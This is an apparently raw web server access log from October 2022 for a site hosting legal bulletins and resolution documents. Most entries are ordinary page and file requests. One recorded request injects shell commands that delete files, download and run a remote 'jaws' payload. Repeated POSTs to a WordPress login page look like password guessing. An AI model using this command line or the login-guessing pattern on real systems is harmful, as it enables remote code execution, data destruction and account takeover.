172.22.2.4 - - [01/Oct/2022:19:13:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
64.124.8.25 - - [01/Oct/2022:19:15:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 304 -
157.55.39.202 - - [01/Oct/2022:19:17:44 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [01/Oct/2022:19:18:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:18:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
185.119.81.96 - - [01/Oct/2022:19:19:13 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [01/Oct/2022:19:19:14 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [01/Oct/2022:19:18:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:19:19:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
201.245.192.253 - - [01/Oct/2022:19:21:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:19:21:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
64.124.8.29 - - [01/Oct/2022:19:22:25 -0500] "-" 408 -
216.245.221.92 - - [01/Oct/2022:19:23:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:23:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
64.124.8.25 - - [01/Oct/2022:19:23:20 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Jurisprudencia%20Sent%202000-00005-01.doc HTTP/1.1" 304 -
64.124.8.25 - - [01/Oct/2022:19:25:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:19:24:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.38 - - [01/Oct/2022:19:26:28 -0500] "-" 408 -
172.22.2.4 - - [01/Oct/2022:19:25:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
156.146.36.209 - - [01/Oct/2022:19:27:29 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
216.245.221.92 - - [01/Oct/2022:19:28:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:28:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
64.124.8.25 - - [01/Oct/2022:19:28:17 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 304 -
64.124.8.25 - - [01/Oct/2022:19:28:39 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-245%20DE%202004.doc HTTP/1.1" 304 -
190.145.240.68 - - [01/Oct/2022:19:29:24 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18ourySkFR4aRbLvACLSX4fySQ4Hfy500zfndAlJjmeFFKUPzVzC4UN&y=U2FsdGVkX1+IwNswDWkR85p0wj1l0+Bbcs0/ugBvZeiPNI2D5CegYy2aa8ysleu/ HTTP/1.1" 503 1124
64.124.8.25 - - [01/Oct/2022:19:30:32 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:19:30:59 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 304 -
64.124.8.25 - - [01/Oct/2022:19:31:12 -0500] "GET /php/CarreraAdministrativa/HERRAMIENTA_EVALUACION_SDA1_NIVEL_ASISTENCIAL_2010.xlsx HTTP/1.1" 404 1018
185.119.81.102 - - [01/Oct/2022:19:31:12 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [01/Oct/2022:19:31:13 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
64.124.8.25 - - [01/Oct/2022:19:31:23 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
64.124.8.25 - - [01/Oct/2022:19:31:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
191.95.172.136 - - [01/Oct/2022:19:31:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.172.136 - - [01/Oct/2022:19:31:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.172.136 - - [01/Oct/2022:19:31:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.145.240.68 - - [01/Oct/2022:19:31:46 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18LudamaJukr9FVZqd7gqMJKYS/th/2BxshCx0EdQm/EnaUD8ppQCBO&y=U2FsdGVkX1+0GoPoEbmWudb4Ieso4xv8nZDp1kK1JfUowrwnBVJXuXedK0UIl0C8 HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:31:47 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+gksoe+fdayCvTDgntUzrC8gWv06515kegacCDIXmTNxWJs6g8fEGk&y=U2FsdGVkX19bFUuJ2g7jock9TQ3qu/Z+souEFiAYqixbmQGuwHQt+FZMG+OGAtTi HTTP/1.1" 503 1124
201.245.192.253 - - [01/Oct/2022:19:31:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
190.145.240.68 - - [01/Oct/2022:19:31:49 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+WYTgtii/AshKHRIJtdHFTnlsgBX3CvYSv8TF21JQ674GLQQ3gcwqA&y=U2FsdGVkX1/o7lGzVcZNpt7Tz0lO0l0AekgceRfN0eTIyih5XCI2WzmcHR9K267e HTTP/1.1" 503 1124
201.245.192.253 - - [01/Oct/2022:19:31:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
190.145.240.68 - - [01/Oct/2022:19:31:50 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18kk6vtPYnwS/uvZjVccNLicfeKlVeqd2s48YreE4vj7bfBQIFsuEvo&y=U2FsdGVkX1+GrT0C9Q11rvNjzumnt8I4QxpqNFbfhM8/WuwNcnj23BXRieEYeodC HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:31:54 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/IvVYzRROcizVZIxOLYVpWPHZs32V/H+OICufXlmr45+unM4aezFIp&y=U2FsdGVkX1/quSIziVRjD1gIWG8Zpskac7FM3X4wjHkTQa4Uw6q+WsggnXh7TyE5 HTTP/1.1" 503 1124
172.22.2.4 - - [01/Oct/2022:19:30:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.145.240.68 - - [01/Oct/2022:19:32:27 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX193cYQWAHZSf0r/xwZ9G4nyXnBYuSP8AkX5TTia2QBS4A1dG0ux3V3M&y=U2FsdGVkX1/M0zmUTe397BOK8qWnE0Ffx/aeEjDqCHiNCiEzK1bBFB5atcZ7fg6+ HTTP/1.1" 503 1124
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [01/Oct/2022:19:32:46 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [01/Oct/2022:19:32:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [01/Oct/2022:19:32:53 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [01/Oct/2022:19:32:53 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [01/Oct/2022:19:32:54 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [01/Oct/2022:19:32:54 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [01/Oct/2022:19:32:54 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [01/Oct/2022:19:32:54 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [01/Oct/2022:19:33:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:19:31:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
201.245.192.253 - - [01/Oct/2022:19:33:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:19:33:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5676&usuario=&sector=&fecha=2009&resuelve= HTTP/1.1" 200 1036
190.159.60.20 - - [01/Oct/2022:19:33:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5676.pdf HTTP/1.1" 200 387388
190.159.60.20 - - [01/Oct/2022:19:33:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
64.124.8.25 - - [01/Oct/2022:19:33:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-1007-2011-1.doc HTTP/1.1" 304 -
172.22.2.4 - - [01/Oct/2022:19:32:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [01/Oct/2022:19:32:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
136.243.79.223 - - [01/Oct/2022:19:33:37 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 406 -
185.119.81.102 - - [01/Oct/2022:19:34:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [01/Oct/2022:19:34:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
190.145.240.68 - - [01/Oct/2022:19:34:09 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19MEdgDq4UXH/a2vQYyq4HFgDaEIpGPEtvQNS/BeSg7Ub4lNDVKFM4q&y=U2FsdGVkX1+9a2GeOavsAm7xDNiyVVmHpo43w36T9fmZeMyrt4UQgWNWL+4rHCy8 HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:14 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX192ikTfzKP+fGIQW+DtTu1rqB63l+nBfBQcZ02Q3m/oMQgwZpmOhM9B&y=U2FsdGVkX19ECwq7q7UZG1SwM2pmYAGIs8RRG9d/xGTAfuetOMsa7Nbrd57rwlBO HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:14 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+wQ5xg3OvsLmmEvmx5WT+JtnX9HVc+Fczc6Tulb8uoTqmSlfi7cW7W&y=U2FsdGVkX1/PoBIu0M6p9NOh3B/JeveyQkTcUCMn1Y1ZUkxHsBSuWMPZdSVRPYmS HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:14 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/9/yyn2FfoYv4FLBeoI8nEb5Xo04p98/JbdbMsSL32zjUDRtntKcn+&y=U2FsdGVkX1/W27MkEMM7imxG2+CHhCiQ+chCfcBpp94Kql3OT0Hi0fzNPsJCjA15 HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:16 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1845b2PIGgQG/AVGc0Tsz8Qj/JXQpCHR6C3mD+Kugft4rIRRk2Bj4pl&y=U2FsdGVkX1/Yk9toaYKVzDI11LvcBBiQoVAejb2wx1O0vQimwRUXeoxskEFPwbB0 HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:16 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/CcdLlU31AO0slu0jUPAkLZ4vF6HJpK64CS+HAz6x9ryghVd5ziDq1&y=U2FsdGVkX18iCiBIKNHJgblOGfdB/qzD+xmTGKDRtbe4Y7jJ0t8YiI4+X8v+SAUj HTTP/1.1" 503 1124
190.145.240.68 - - [01/Oct/2022:19:34:21 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19FwXxu1EKCfsshUU+nx1OkiJIc+Rru5QRz0X3R2ld9GoksqToMwUf1&y=U2FsdGVkX1+tK/c5l+dkVWOkzgSVTMd/jHV+Ny1BdjQAwRK3W/a4QXtFRYgJosIv HTTP/1.1" 503 1124
181.50.216.54 - - [01/Oct/2022:19:34:32 -0500] "GET /appsia/controlador HTTP/1.1" 503 1124
181.50.216.54 - - [01/Oct/2022:19:34:33 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.118.62.219 - - [01/Oct/2022:19:35:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.118.62.219 - - [01/Oct/2022:19:35:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
200.118.62.219 - - [01/Oct/2022:19:35:27 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [01/Oct/2022:19:34:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
190.145.240.68 - - [01/Oct/2022:19:36:30 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18imozUAo/dCY+B4mZdTVFGnxBWy2OZ8kNroUyYYVPhZlHUskTTAQkF&y=U2FsdGVkX1/4d4fUbKVV725VDIJm3/LKaGYffzwVCuXgJddqQcAj0WuGW7a2Ld+X HTTP/1.1" 503 1124
207.46.13.84 - - [01/Oct/2022:19:36:42 -0500] "GET /BLA/resoluciones/00000316.tif HTTP/1.1" 404 1018
207.46.13.40 - - [01/Oct/2022:19:36:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1561.pdf HTTP/1.1" 200 431500
207.46.13.190 - - [01/Oct/2022:19:37:33 -0500] "GET /BLA/resoluciones/AUTOS%202022/4875.pdf HTTP/1.1" 200 432852
216.245.221.92 - - [01/Oct/2022:19:38:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:19:36:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:38:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:19:38:37 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [01/Oct/2022:19:38:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [01/Oct/2022:19:37:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
157.55.39.202 - - [01/Oct/2022:19:39:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001093.tif HTTP/1.1" 200 123654
172.22.2.4 - - [01/Oct/2022:19:39:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
172.22.2.4 - - [01/Oct/2022:19:40:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
207.46.13.190 - - [01/Oct/2022:19:40:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204001%20AL%204100/RESOLUCION%204090%20DE%202007.pdf HTTP/1.1" 304 -
111.51.8.29 - - [01/Oct/2022:19:41:10 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [01/Oct/2022:19:41:47 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [01/Oct/2022:19:41:48 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
199.59.150.181 - - [01/Oct/2022:19:42:11 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
207.46.13.84 - - [01/Oct/2022:19:42:53 -0500] "GET /BLA/resoluciones/00001799.tif HTTP/1.1" 404 1018
216.245.221.92 - - [01/Oct/2022:19:43:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:43:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [01/Oct/2022:19:42:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.13.162 - - [01/Oct/2022:19:44:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.53.13.162 - - [01/Oct/2022:19:44:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.53.13.162 - - [01/Oct/2022:19:44:26 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [01/Oct/2022:19:43:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [01/Oct/2022:19:44:44 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [01/Oct/2022:19:44:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
181.53.13.162 - - [01/Oct/2022:19:44:52 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.53.13.162 - - [01/Oct/2022:19:44:52 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.53.13.162 - - [01/Oct/2022:19:44:52 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
181.53.13.162 - - [01/Oct/2022:19:44:52 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
181.53.13.162 - - [01/Oct/2022:19:44:55 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2005%2F HTTP/1.1" 200 49518
181.53.13.162 - - [01/Oct/2022:19:44:55 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
181.53.13.162 - - [01/Oct/2022:19:44:55 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
181.53.13.162 - - [01/Oct/2022:19:44:55 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
181.53.13.162 - - [01/Oct/2022:19:45:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2005%2FRES+2005+451-500%2F HTTP/1.1" 200 12244
181.53.13.162 - - [01/Oct/2022:19:45:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20451-500/00000466.tif HTTP/1.1" 200 160666
172.22.2.4 - - [01/Oct/2022:19:44:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
199.16.157.181 - - [01/Oct/2022:19:45:34 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
157.55.39.154 - - [01/Oct/2022:19:46:47 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [01/Oct/2022:19:48:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:48:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
64.124.8.29 - - [01/Oct/2022:19:48:29 -0500] "-" 408 -
157.55.39.202 - - [01/Oct/2022:19:48:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+201-250%2F HTTP/1.1" 200 12325
207.46.13.89 - - [01/Oct/2022:19:48:48 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
157.55.39.202 - - [01/Oct/2022:19:49:15 -0500] "GET /BLA/resoluciones/AUTOS%202022/2987.pdf HTTP/1.1" 200 404386
172.22.2.4 - - [01/Oct/2022:19:48:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.202 - - [01/Oct/2022:19:50:17 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/R/Resolucion3074del3deJuniode2011/Resolucion3074del3deJuniode2011.asp?IdArticulo=6538 HTTP/1.1" 200 527
152.200.169.86 - - [01/Oct/2022:19:50:22 -0500] "GET /forest/ HTTP/1.1" 200 12041
152.200.169.86 - - [01/Oct/2022:19:50:26 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
172.22.2.4 - - [01/Oct/2022:19:48:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
64.124.8.29 - - [01/Oct/2022:19:51:00 -0500] "-" 408 -
64.124.8.29 - - [01/Oct/2022:19:51:44 -0500] "-" 408 -
207.46.13.84 - - [01/Oct/2022:19:51:45 -0500] "GET /BLA/resoluciones/AUTOS%202022/2923.pdf HTTP/1.1" 200 412856
66.249.73.88 - - [01/Oct/2022:19:51:58 -0500] "-" 408 -
66.249.73.127 - - [01/Oct/2022:19:52:21 -0500] "-" 408 -
181.53.13.162 - - [01/Oct/2022:19:52:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2F HTTP/1.1" 200 38542
216.245.221.92 - - [01/Oct/2022:19:53:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:53:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
181.53.13.162 - - [01/Oct/2022:19:53:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1551-1600%2F HTTP/1.1" 200 12369
181.53.13.162 - - [01/Oct/2022:19:53:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201551-1600/00001565.tif HTTP/1.1" 200 189212
181.53.13.162 - - [01/Oct/2022:19:53:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201551-1600/00001555.tif HTTP/1.1" 200 199878
172.22.2.4 - - [01/Oct/2022:19:53:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [01/Oct/2022:19:53:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [01/Oct/2022:19:54:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42704
172.22.2.4 - - [01/Oct/2022:19:54:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43213
216.245.221.92 - - [01/Oct/2022:19:58:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [01/Oct/2022:19:58:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
